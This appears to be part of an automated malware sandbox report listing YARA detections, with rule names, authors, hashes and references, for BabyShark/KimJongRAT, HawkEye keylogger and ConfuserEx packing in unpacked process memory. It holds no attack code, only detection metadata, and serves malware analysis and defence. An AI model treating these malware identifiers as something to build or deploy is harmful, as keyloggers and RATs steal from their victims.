            Source: 35.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.4b4834a.3.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.2.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.f1834a.2.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.3.RegAsm.exe.43bb8f2.0.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.3.RegAsm.exe.47c35a8.2.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.ec0345.3.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.2.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.4af0000.2.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.6abdc50.5.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.3.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 1.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 1.3.RegAsm.exe.481b8f2.0.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.3.RegAsm.exe.47c38ed.1.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.4b4834a.3.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 1.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 30.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 7.3.winlogons.exe.3790000.0.unpack, type: UNPACKEDPE, Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 8.3.RegAsm.exe.43bb8f2.0.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 8.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 30.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.3.RegAsm.exe.481b8f2.0.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.3.RegAsm.exe.43635a8.2.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.ec0000.1.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.3.RegAsm.exe.43635a8.2.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 8.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE, Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 0.3.slowday.exe.3b50000.0.unpack, type: UNPACKEDPE, Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 8.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 30.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: MAL_HawkEye_Keylogger_Gen_Dec18 date = 2018-12-10, hash1 = b8693e015660d7bd791356b352789b43bf932793457d54beae351cf7a3de4dad, author = Florian Roth, description = Detects HawkEye Keylogger Reborn, reference = https://twitter.com/James_inthe_box/status/1072116224652324870
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: SUSP_NET_NAME_ConfuserEx author = Arnim Rupp, description = Detects ConfuserEx packed file, reference = https://github.com/yck1509/ConfuserEx, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 2021-01-22, modified = 2021-01-25
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_HawkEyeV9 author = ditekshen, description = Detects HawkEyeV9 payload, clamav_sig = MALWARE.Win.Trojan.HawkEyeV9
            Source: 1.0.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: HawkEyev9 author = ditekshen, description = HawkEye v9 Payload, cape_type = HawkEyev9 Payload
            Source: 1.2.RegAsm.exe.ec0000.1.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.5.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.3.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.4.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.3.RegAsm.exe.47c35a8.2.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 30.0.vbc.exe.400000.4.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.0.vbc.exe.400000.5.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 35.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.3.RegAsm.exe.43638ed.1.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.f1834a.2.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.4af0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.6771c10.6.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.4af0345.1.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 8.2.RegAsm.exe.680dc50.4.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
            Source: 1.2.RegAsm.exe.6a21c10.4.raw.unpack, type: UNPACKEDPE, Matched rule: APT_NK_BabyShark_KimJoingRAT_Apr19_1 date = 2019-04-27, hash1 = d50a0980da6297b8e4cec5db0a8773635cee74ac6f5c1ff18197dfba549f6712, author = Florian Roth, description = Detects BabyShark KimJongRAT, reference = https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/
